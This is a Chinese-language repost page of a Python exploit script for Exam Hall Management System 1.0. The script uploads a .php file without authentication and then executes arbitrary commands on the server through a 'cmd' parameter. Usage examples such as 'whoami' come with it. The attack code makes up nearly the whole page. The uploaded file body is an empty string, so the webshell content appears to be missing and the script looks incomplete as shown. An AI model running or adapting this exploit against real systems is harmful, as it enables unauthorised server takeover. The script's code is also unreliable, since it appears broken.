# Exam Hall Management System 1.0 任意文件上傳&RCE漏洞
==EXP==
# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated) # Exploit Author: Davide 'yth1n' Bianchin # Contacts: davide dot bianchin at dedagroup dot it # Original PoC: https://exploit-db.com/exploits/50103 # Date: 06.07.2021 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import os import sys import string import random import time host = 'localhost' #CHANGETHIS path = 'SourceCode' #CHANGETHIS url = 'http://'+host+'/'+path+'/pages/save_user.php' def id_generator(size=6, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size))+'.php' if len(sys.argv) == 1: print("#########") print("Usage: python3 examhallrce.py command") print("Usage: Use the char + to concatenate commands") print("Example: python3 examhallrce.py whoami") print("Example: python3 examhallrce.py ls+-la") print("#########") exit() filename = id_generator() print("Generated "+filename+ " file..") time.sleep(2) print("Uploading file..") time.sleep(2) def reverse(): command = sys.argv[1] multipart_data = MultipartEncoder({ 'image': (filename, '', 'application/octet-stream'), 'btn_save': '' }) r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type}) endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+'' print("Success, file correctly uploaded at: " +endpoint+ "") time.sleep(1) print("Executing command in 1 seconds:\n") time.sleep(1) os.system("curl -X GET "+urlo+"") reverse()
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容